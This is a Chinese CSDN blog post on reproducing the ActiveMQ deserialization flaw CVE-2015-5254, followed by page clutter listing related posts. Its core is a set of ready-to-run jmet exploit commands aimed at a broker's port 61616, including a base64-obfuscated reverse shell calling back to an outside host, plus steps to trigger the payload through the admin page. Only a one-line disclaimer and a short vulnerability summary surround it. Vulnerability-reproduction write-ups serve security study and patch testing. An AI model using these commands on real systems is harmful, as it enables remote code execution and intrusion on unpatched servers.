ActiveMQ 反序列化漏洞(CVE-2015-5254)

于 2022-09-13 19:00:12 发布
阅读量170 收藏
点赞数
分类专栏: 漏洞复现 文章标签: java-activemq activemq java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiTaiShen/article/details/126839445
版权
Apache ActiveMQ 5.x版本存在一个安全漏洞,允许远程攻击者通过特制的序列化Java Message Service (JMS) ObjectMessage对象执行任意代码。影响范围包括5.x到5.13.0版本。文章介绍了漏洞简介、影响及如何复现此漏洞,并提供了复现工具链接。
摘要由CSDN通过智能技术生成

ActiveMQ 反序列化漏洞(CVE-2015-5254)

此文章仅供用于学习研究,严禁用于非法用途,否则后果自负。

漏洞简介

Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。

漏洞影响

Apache ActiveMQ 5.x ~ 5.13.0

漏洞复现

工具地址:

https://github.com/matthiaskaiser/jmet/releases/tag/0.1.0

命令:

#在/tmp/下创建文件
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -Y "touch /tmp/Angustest" -Yp ROME 192.168.102.137 61616

#反弹shell使用base64加密
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMS8zMzA2IDA+JjE=}|{base64,-d}|{bash,-i}" -Yp ROME 49.235.76.210 61616

1、构造(可以使用ysoserial)可执行命令的序列化对象

2、作为一个消息,发送给目标61616端口

3、 访问web管理页面,读取消息,触发漏洞

http://ip:8161/admin/browse.jsp?JMSDestination=event
初岄
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
ActiveMQ 反序列化漏洞 (CVE-2015-5254)
qq_32642035的博客
10-17 1229
ActiveMQ 反序列化漏洞 (CVE-2015-5254)漏洞复现
activemq_CVE-2015-5254_漏洞复现_源码分析
qq_51550750的博客
06-03 653
ActiveMQ-CVE-2015-5254
CVECVE-2015-5254ActiveMQ 反序列化漏洞利用
边扯边淡
03-15 1861
起序:复现不难,就是需要好好的准备好靶场环境。 一、靶场环境 使用的是 github 上的 vulhub 环境。ActiveMQ 版本为 5.11.1。 vulhub:https://github.com/vulhub/vulhub 1、漏洞反序列化漏洞漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。 2、影响版本 ActiveMQ < 5.13.0 之前 5.x 版本。 .
ActiveMQ 反序列化漏洞CVE-2015-5254)利用工具
08-15
2015年,ActiveMQ被发现存在一个严重的安全漏洞,被称为CVE-2015-5254,这是一个反序列化漏洞,允许攻击者通过精心构造的恶意消息来执行任意代码,从而对目标系统造成重大威胁。 反序列化漏洞通常发生在对象从...
ActiveMQ反序列化漏洞CVE-2015-5254漏洞利用工具
11-25
ActiveMQ反序列化漏洞CVE-2015-5254漏洞利用工具,说明文档已存在请进行查看
activemq-cpp-library-3.9.5 编译的windows库文件,支持vs2015、vs2017
07-21
总之,ActiveMQ-CPP Library 3.9.5为C++开发者提供了与ActiveMQ交互的便捷方式,结合Visual Studio 2015和2017的支持,能够在Windows平台上高效地构建消息驱动的应用程序。通过理解其核心组件和使用方法,开发者可以...
apache-activemq-5.16.5-bin.tar.gz 下载(5积分)
08-17
Apache ActiveMQ是Apache软件基金会的一个开源项目,是一个基于消息的通信中间件。ActiveMQ是JMS的一个具体实现,支持JMS的两种消息模型。ActiveMQ使用AMQP协议集成多平台应用,使用STOMP协议通过websockets在Web...
apache-activemq-5.16.5
12-27
标题"apache-activemq-5.16.5"指的是该软件的一个特定版本,即5.16.5版本,通常每个新版本都会包含错误修复、性能提升以及新功能的添加。 描述中提到"启动要求jdk版本8+", 这意味着在运行Apache ActiveMQ 5.16.5...
部署ActiveMQ
Adelly的博客
01-18 286
1.下载ActiveMQ到/usr/local目录下cd /usr/localwget http://archive.apache.org/dist/activemq/apache-activemq/5.9.0/apache-activemq-5.9.0-bin.tar.gz2.安装ActiveMQ解压文件apache-activemq-5.9.0-bin.tar.gztar -xzf apach
ActiveMQ进阶配置
lyb3290的博客
04-08 3269
配置web管理页面的安全认证 配置web管理页面的绑定IP和端口 配置MQ连接的安全认证 禁用不使用的连接协议 绑定协议连接端口到指定IP 使用MySql作为持久化保存 配置基于JDBC的高可用环境 修改内存 注册为Service 配置web管理页面的安全认证 默认的web页面用户名密码admin:admin,非常不安全, 编辑jetty-realm.
ActiveMQ安装配置及实例
程序员小董的专栏
06-08 5185
本文可作为吴水成老师,dubbo课程第21节的学习笔记。 ActiveMQ的介绍及功能 参考百度 ActiveMQ的下载 https://activemq.apache.org/activemq-5113-release.html 另外,直接从官网下载,会有些慢,右键,检查,找到地址后用迅雷下载 下载的文件解压后如下: 安装及配置 和Acti
CVE-2015-5254(ActiveMQ反序列化漏洞复现)
Sea_Sand息禅
07-13 2884
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。 Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者...
Activemq
xiwangyizhicunzai的博客
10-17 973
ActiveMQ 简介:ActiveMQ 是 Apache 软件基金会下的一个开源消息驱动中 间件软件。Jetty 是一个开源的 servlet 容器,它为基于 Java 的 web 容器,例如 JSP 和 servlet 提供运行环境。ActiveMQ 5.0 及以后版本默认集成了jetty。在启动后提供一个监控 ActiveMQ 的 Web 应用。 ActiveMQ占用两个端口: 616...
ActiveMQ反序列化漏洞(CVE-2015-5254)
07-16 516
1.漏洞介绍:Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程***者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任...
ActiveMQ 反序列化漏洞
最新发布
08-19
ActiveMQ 反序列化漏洞是指在使用 ActiveMQ 进行消息传递时,由于未正确验证和过滤用户提交的数据,恶意攻击者可以利用该漏洞在目标系统上执行任意代码。这种漏洞通常是由于未正确配置 ActiveMQ 的序列化和反序列化...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

初岄

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值